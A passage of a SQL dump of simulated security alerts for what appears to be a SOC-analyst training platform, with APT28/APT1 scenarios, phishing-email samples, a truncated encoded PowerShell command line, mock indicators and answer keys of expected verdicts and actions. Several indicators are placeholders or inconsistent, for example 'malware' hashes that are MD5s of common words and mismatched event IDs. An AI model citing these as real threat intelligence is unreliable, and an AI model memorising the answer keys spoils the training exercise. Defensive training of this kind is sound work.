(796, 'Exfiltration: Encrypted Data Transfer', 'high', 'Data Loss Prevention (DLP) Systems', 'APT1 executed the final phase of their operation by encrypting and exfiltrating sensitive guest records, including passport numbers, through a masked data transfer to avoid detection. The transfer was facilitated over a compromised internal server using encrypted channels.', 'Data Exfiltration', 'T1048.001 - Exfiltration Over Alternative Protocol: Encrypted Channels', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:37:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.1.45\",\"destination_ip\":\"203.0.113.77\",\"protocol\":\"TLS\",\"filename\":\"guest_data_encrypted.zip\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"user\":\"jdoe\",\"event_id\":\"EXFIL-2023-5678\",\"action\":\"transfer\",\"status\":\"completed\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for data transfer\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT1\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with APT1\'s data exfiltration tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"guest_data_encrypted.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file encrypted for exfiltration\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(797, 'Spear-Phishing Campaign Detected', 'high', 'Email security logs', 'APT28 initiated a spear-phishing campaign targeting DNC staff to gain initial access by harvesting their credentials. The malicious email contained a link leading to a credential harvesting site.', 'Initial Access', 'T1566.001 - Phishing: Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"email_id\":\"b1234567890abc\",\"sender\":\"noreply@dnc-support.com\",\"recipient\":\"johndoe@dnc.org\",\"subject\":\"Urgent: Security Update Required\",\"body_preview\":\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\",\"attachment\":\"none\",\"url\":\"http://dnc-security-update.com/login?\",\"sender_ip\":\"198.51.100.23\",\"recipient_ip\":\"192.168.1.45\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\",\"threat_actor\":\"APT28\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@dnc-support.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known phishing campaigns by APT28.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://dnc-security-update.com/login?\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing site designed to harvest credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known APT28 infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hash Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"Associated with recent phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(798, 'X-Agent Implant Executed', 'high', 'Endpoint detection and response (EDR) logs', 'APT28 deployed the X-Agent implant on a compromised system, executing malware to maintain access and collect data. EDR detected the execution of a suspicious binary associated with known APT28 activities.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:18Z\",\"event_id\":\"4625\",\"computer_name\":\"compromised-host.local\",\"user\":\"DOMAIN\\\\compromised_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"C:\\\\Windows\\\\Temp\\\\xagent.exe\",\"process_hash\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"command_line\":\"xagent.exe -collect -report\",\"network_activity\":[{\"protocol\":\"TCP\",\"destination_ip\":\"198.51.100.24\",\"destination_port\":443}]}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT28 C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"APT28 associated IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"X-Agent malware sample\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\xagent.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"LocalEDR\",\"verdict\":\"malicious\",\"details\":\"Detected execution of known APT28 malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(799, 'X-Tunnel Backdoor Established', 'high', 'Network traffic analysis', 'The attackers have successfully established a persistent backdoor using the X-Tunnel tool to maintain secure communication with their command and control servers. This is an intermediate level threat indicating ongoing persistent access.', 'Persistence', 'T1105 - Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-07T14:23:45Z\",\"event_id\":\"1003\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"185.92.220.75\",\"protocol\":\"TCP\",\"port\":\"443\",\"filename\":\"x-tunnel-backdoor.exe\",\"file_hash\":\"7b9f8e2b5f9c3a4d5e6f7a8b9c0d1e2f\",\"username\":\"jdoe\",\"action\":\"establish_connection\",\"description\":\"Established connection between internal host and external C2 server using encrypted tunnel.\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP associated with APT28.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7b9f8e2b5f9c3a4d5e6f7a8b9c0d1e2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known X-Tunnel malware used by APT28.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(800, 'Credential Dump for Lateral Movement', 'high', 'Active Directory logs', 'APT28 has utilized harvested credentials to perform lateral movement within the DNC network. The threat actor aimed to maximize access and control over critical systems by leveraging stolen credentials.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"ip_address\":\"185.123.45.67\",\"username\":\"j.doe\",\"domain\":\"DNC\",\"target_server\":\"192.168.1.15\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"ntds.dit\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT28 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Employee account used in suspicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash related to possible credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ntds.dit\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Critical Active Directory database file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(801, 'Data Exfiltration to External Servers', 'high', 'Data loss prevention (DLP) systems', 'Sensitive data exfiltrated to external servers and later weaponized to influence the 2016 election.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:47Z\",\"event_id\":\"DLPE-20231005142247\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"198.51.100.14\",\"username\":\"jdoe\",\"exfiltrated_files\":[{\"filename\":\"confidential_report_2023.pdf\",\"hash\":\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\",\"size\":\"3.2MB\"}],\"related_domain\":\"malicious-exfiltration.com\",\"connection_protocol\":\"HTTPS\",\"detection_method\":\"anomalous data transfer\",\"description\":\"Large data transfer detected to external IP associated with known malicious domain.\",\"correlation_id\":\"C-20231005-XYZ123\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT28 and previous exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee with access to sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash potentially linked to known exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain used in previous APT28 campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 